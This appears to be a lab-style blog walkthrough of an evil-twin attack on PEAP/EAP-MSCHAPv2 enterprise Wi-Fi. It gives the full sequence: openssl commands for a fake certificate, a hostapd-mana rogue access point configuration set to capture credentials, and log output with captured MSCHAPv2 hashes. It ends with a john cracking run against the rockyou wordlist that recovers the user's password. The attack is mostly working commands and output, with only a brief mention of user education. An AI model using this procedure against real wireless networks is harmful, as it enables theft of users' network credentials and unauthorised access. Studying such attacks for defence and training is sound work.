PEAP EAP-MSCHAPV2 Attack

References:

  1. hostapd
  2. Hostapd-mana
  3. OpenSSL
  4. hostapd.eap_user

EVP_RSA_gen() generates a new RSA key pair with modulus size bits.

 openssl genrsa -out server.key 2048

Create a certificate signing request.
└─$ openssl req -new -sha256 -key server.key -out csr.csr      
                                                                                        
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:New York
Locality Name (eg, city) []:New York
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Secure Wireless INC.
Organizational Unit Name (eg, section) []:Secure Wireless
Common Name (e.g. server FQDN or YOUR name) []:encrypted.securewireless.com
Email Address []:security@securewireless.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:Secure Wireless INC.


openssl req -x509 -sha256 -days 365 -key server.key -in csr.csr -out server.pem

openssl dhparam 2048 > dhparam.pem
 ln -s server.pem ca.pem

Create the hostapd.eap_user file

└─$ sudo nano hostapd.eap_user
* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]

Create the hostapd-mana fake AP.

sudo nano fakeap2.conf

interface=wlan0
ssid=03252022
hw_mode=g
driver=nl80211
channel=6
auth_algs=3
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
ieee8021x=1
eap_server=1
eap_user_file=/home/lab/Downloads/hostapd-mana/test2/hostapd.eap_user
ca_cert=/home/lab/Downloads/hostapd-mana/test2/ca.pem
dh_file=/home/lab/Downloads/hostapd-mana/test2/dhparam.pem
server_cert=/home/lab/Downloads/hostapd-mana/test2/server.pem
private_key=/home/lab/Downloads/hostapd-mana/test2/server.key
mana_wpe=1
mana_eapsuccess=1
mana_credout=hostapd.creds
enable_sycophant=1
sycophant_dir=/tmp/

Start the fakeap with hostapd-mana

 sudo hostapd-mana fakeap2.conf 

The SSID is being broadcast over the air


Use airodump-ng to verify the auth type. MGT means that the network is doing 802.1X

 sudo airodump-ng --band abg wlan2 --channel 6 --essid 03252022 -w 03252022-CAPTURE

Connecting a client



This is where educating users on the dangers of trusting certificates when presented on the wireless network. The fake certificate that was previously created is being presented to the user.


Attackers can be creative when generating fake certificates.


Let’s take a look at the layer two packet capture. The fake AP will operate like a legitimate AP when it’s communicating with the RADIUS server.

The wireless device will go through the standard probe, association request, identity request, and EAP. The attacker aims to trick the user into entering their network credentials.







Let’s take a look at what the attacker was able to capture

The attacker was is able to see the username, and hostapd-mana captured a hash of the credentials.

                                                                                                                  
└─$ sudo hostapd-mana fakeap2.conf

Configuration file: fakeap2.conf
MANA: Captured credentials will be written to file 'hostapd.creds'.
Using interface wlan0 with hwaddr 00:11:22:33:44:00 and ssid "03252022"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED
wlan0: STA 5e:05:3d:f0:3e:3e IEEE 802.11: authenticated
wlan0: STA 5e:05:3d:f0:3e:3e IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED 5e:05:3d:f0:3e:3e
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: wirelessuser
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: wirelessuser
MANA EAP EAP-MSCHAPV2 ASLEAP user=wirelessuser | asleap -C e2:68:ff:a0:c2:5d:fc:59 -R fd:26:a7:a3:6e:a2:a3:6f:8f:9c:f4:5e:a1:1c:d4:ce:8d:72:36:1a            :ec:26:66:f2
MANA EAP EAP-MSCHAPV2 JTR | wirelessuser:$NETNTLM$e268ffa0c25dfc59$fd26a7a36ea2a36f8f9cf45ea11cd4ce8d72361aec2666f2:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | wirelessuser::::fd26a7a36ea2a36f8f9cf45ea11cd4ce8d72361aec2666f2:e268ffa0c25dfc59
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): cf 0c 65 bf 82 cb ed 00 c0 04 33 9d e5 98 bd 21
wlan0: CTRL-EVENT-EAP-SUCCESS 5e:05:3d:f0:3e:3e
wlan0: STA 5e:05:3d:f0:3e:3e IEEE 802.11: disassociated
wlan0: STA 5e:05:3d:f0:3e:3e IEEE 802.11: deauthenticated due to inactivity (timer DEAUTH/REMOVE)
^Cwlan0: interface state ENABLED->DISABLED
wlan0: AP-DISABLED
nl80211: deinit ifname=wlan0 disabled_11b_rates=0

Create a file and add the JRT text

└─$ nano hash.txt

cat hash.txt                                                                                                                                       
wirelessuser:$NETNTLM$e268ffa0c25dfc59$fd26a7a36ea2a36f8f9cf45ea11cd4ce8d72361aec2666f2:::::::

Attempt to crack the password

└─$ sudo john --format=netntlm -w /pentest/rockyou.txt hash.txt

Warning: invalid UTF-8 seen reading /pentest/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlm, NTLMv1 C/R [MD4 DES (ESS MD5) 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=3
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
Summer           (wirelessuser)
1g 0:00:00:00 DONE (2023-03-25 16:37) 100.0g/s 204000p/s 204000c/s 204000C/s queenie..passw0rd
Use the "--show --format=netntlm" options to display all of the cracked passwords reliably
Session completed.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.